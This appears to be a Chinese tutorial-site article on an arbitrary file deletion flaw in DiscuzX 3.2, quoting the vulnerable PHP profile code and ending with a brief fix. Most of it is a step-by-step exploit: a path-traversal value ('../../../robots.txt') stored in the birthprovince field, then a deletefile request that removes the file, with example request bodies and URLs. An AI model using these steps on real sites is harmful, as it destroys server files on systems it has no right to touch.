一招解决DiscuzX任意文件操作漏洞问题

发布时间:2020-02-19编辑:脚本学堂
DiscuzX曝出任意文件操作漏洞,利用此漏洞可以删除服务器上的任意文件,这里分享下DiscuzX任意文件操作漏洞的解决办法,帮助大家快速修复此漏洞。

DiscuzX任意文件操作漏洞的解决办法

说明:漏洞实际上是任意文件删除,但是由于删除的函数容易被定位,所以不方便写在简要描述或标题内。

DiscuzX 3.2的代码,在
source/include/spacecp/spacecp_profile.php 中找到以下代码:
 

复制代码 代码示例:
if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
foreach($_GET['deletefile'] as $key => $value) {
if(isset($_G['cache']['profilesetting'][$key])) {
echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);
@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
@unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
$verifyarr[$key] = $setarr[$key] = '';
}
}
}

往上跟发现$_GET['deletefile']没有任何处理,$space[$key]来自
 

$space = getuserbyuid($_G['uid']);
space_merge($space, 'field_home');
space_merge($space, 'profile');

思路:
需要在$space变量中找到一个存在需要被删除的文件的位置,我用的字段是birthprovince。

第一次在birthprovince里加上我们要删除的文件然后保存资料,下次我们提交$_GET['deletefile'][birthprovince],那么$space[birthprovince]指向的文件就会被删除。

提交birthprovince为../../../robots.txt

保存完之后,数据库里的$space['birthprovice']会成为../../../robots.txt,当我们提交$_GET['deletefile'][birthprovince]的时候,会去删除$space['birthprovice']指向的文件。

操作步骤:

那么登陆后提交:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0

注意,85cf7ef0是你的formhash。
http://localhost/dx/home.php?mod=spacecp&ac=profile&op=base

提示保存成功

这个时候birthprovince就是../../../robots.txt,产生的$space['birthprovince']就是../../../robots.txt了。

接下来进行参数的操作,提交:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0


http://localhost/study/dx/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa

文件就被顺利删除了。

修复方案:
检查下deletefile指向的key是不是自定义字段里允许FILES的字段。